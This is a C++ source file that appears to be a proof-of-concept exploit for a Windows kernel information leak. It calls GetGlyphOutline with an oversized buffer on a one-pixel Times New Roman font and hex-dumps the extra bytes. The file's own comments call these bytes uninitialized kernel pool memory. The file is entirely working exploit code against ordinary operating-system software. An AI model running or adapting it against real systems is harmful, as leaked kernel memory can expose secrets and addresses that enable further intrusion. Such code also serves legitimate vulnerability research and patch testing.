#include <Windows.h>
#include <cstdio>

VOID PrintHex(PBYTE Data, ULONG dwBytes) {
  for (ULONG i = 0; i < dwBytes; i += 16) {
    printf("%.8x: ", i);

    for (ULONG j = 0; j < 16; j++) {
      if (i + j < dwBytes) {
        printf("%.2x ", Data[i + j]);
      } else {
        printf("?? ");
      }
    }

    for (ULONG j = 0; j < 16; j++) {
      if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
        printf("%c", Data[i + j]);
      } else {
        printf(".");
      }
    }

    printf("\n");
  }
}

int main(int argc, char **argv) {
  if (argc < 2) {
    printf("Usage: %s <number of bytes to leak>\n", argv[0]);
    return 1;
  }

  UINT NumberOfLeakedBytes = strtoul(argv[1], NULL, 0);

  // Create a Device Context.
  HDC hdc = CreateCompatibleDC(NULL);

  // Create a TrueType font.
  HFONT hfont = CreateFont(1,                   // nHeight
                           1,                   // nWidth
                           0,                   // nEscapement
                           0,                   // nOrientation
                           FW_DONTCARE,         // fnWeight
                           FALSE,               // fdwItalic
                           FALSE,               // fdwUnderline
                           FALSE,               // fdwStrikeOut
                           ANSI_CHARSET,        // fdwCharSet
                           OUT_DEFAULT_PRECIS,  // fdwOutputPrecision
                           CLIP_DEFAULT_PRECIS, // fdwClipPrecision
                           DEFAULT_QUALITY,     // fdwQuality
                           FF_DONTCARE,         // fdwPitchAndFamily
                           L"Times New Roman");

  // Select the font into the DC.
  SelectObject(hdc, hfont);

  // Get the glyph outline length.
  GLYPHMETRICS gm;
  MAT2 mat2 = { 0, 1, 0, 0, 0, 0, 0, 1 };
  DWORD OutlineLength = GetGlyphOutline(hdc, 'A', GGO_BITMAP, &gm, 0, NULL, &mat2);
  if (OutlineLength == GDI_ERROR) {
    printf("[-] GetGlyphOutline#1 failed.\n");

    DeleteObject(hfont);
    DeleteDC(hdc);
    return 1;
  }

  // Allocate memory for the outline + leaked data.
  PBYTE OutputBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, OutlineLength + NumberOfLeakedBytes);

  // Fill the buffer with uninitialized pool memory from the kernel.
  OutlineLength = GetGlyphOutline(hdc, 'A', GGO_BITMAP, &gm, OutlineLength + NumberOfLeakedBytes, OutputBuffer, &mat2);
  if (OutlineLength == GDI_ERROR) {
    printf("[-] GetGlyphOutline#2 failed.\n");

    HeapFree(GetProcessHeap(), 0, OutputBuffer);
    DeleteObject(hfont);
    DeleteDC(hdc);
    return 1;
  }

  // Print the disclosed bytes on screen.
  PrintHex(&OutputBuffer[OutlineLength], NumberOfLeakedBytes);

  // Free resources.
  HeapFree(GetProcessHeap(), 0, OutputBuffer);
  DeleteObject(hfont);
  DeleteDC(hdc);

  return 0;
}